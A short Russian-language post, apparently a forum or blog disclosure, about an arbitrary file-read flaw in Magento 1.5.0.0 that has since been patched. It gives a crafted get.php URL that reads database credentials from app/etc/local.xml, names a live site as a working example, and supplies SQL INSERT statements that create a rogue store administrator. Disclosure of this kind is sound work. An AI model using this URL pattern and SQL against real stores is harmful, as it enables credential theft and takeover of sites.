Вход
Регистрация
Помощь
В связи с этим событием на разработчиков Magento, видимо, очень давило руководство: уж очень им хотелось приурочить выпуск Magento 1.5 к конференции.
Что ж, те и выпустили.
Однако, версия Magento 1.5.0.0, выпущенная вчера, содержит уязвимость безопасности: вы можете прочитать любой файл сайта на Magento 1.5.0.0, сформировав специальный URL.
Например, вы можете прочитать из файла app/etc/local.xml параметры подключения к базе данных:
http://<ваш сайт на Magento 1.5.0.0>/get.php/app/etc/local.xml
Рабочий пример (сайт magazento.com): http://magazento.com...p/etc/local.xml
Зная параметры подключения к базе данных, можно, не мудрствуя лукаво, сразу сделать себя администратором магазина, например
:INSERT INTO `admin_user` (`firstname`, `lastname`, `email`, `username`, `password`, `created`, `modified`, `logdate`, `lognum`, `reload_acl_flag`, `is_active`, `extra`) VALUES
('dfediuk', 'dfediuk', 'dfediuk@gmail.com', 'dfediuk', CONCAT(MD5('qXpassword'), ':qX'), '2009-02-16 09:07:53', '2009-10-23 12:50:52', '2010-01-27 06:13:37', 34, 0, 1, '');
INSERT INTO `admin_role` (`parent_id`, `tree_level`, `sort_order`, `role_type`, `user_id`, `role_name`) VALUES
(1, 2, 0, 'U', LAST_INSERT_ID(), 'dfediuk');Хороший жизненный пример, почему программистов нельзя торопить, а если можно - чего потом стоит ожидать от своего сайта.
Разработчики Magento уже в курсе данного дефекта и час назад выпустили заплатку: Magento 1.5.0.1
